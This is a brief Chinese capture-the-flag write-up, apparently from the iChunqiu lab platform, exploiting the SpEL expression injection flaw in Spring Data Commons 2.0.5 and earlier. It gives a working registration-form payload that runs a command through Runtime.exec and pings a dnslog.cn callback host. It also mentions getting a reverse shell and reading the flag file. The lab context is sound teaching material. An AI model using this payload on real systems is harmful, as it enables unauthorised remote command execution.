声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
春秋云镜开启靶场:
http://eci-2zeb74391jsq4fsn5i7q.cloudeci1.ichunqiu.com:8080/
注册页面
http://eci-2zeb74391jsq4fsn5i7q.cloudeci1.ichunqiu.com:8080/users
注册抓包修改数据
username=123&password=123&repeatedPassword=123
修改为
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping g1obde.dnslog.cn(执行的命令)")]=&password=&repeatedPassword=
反弹shell
做好payload还需要进行url编码
发包测试
服务器成功收到shell
获取flag
cat ../../../../../../flag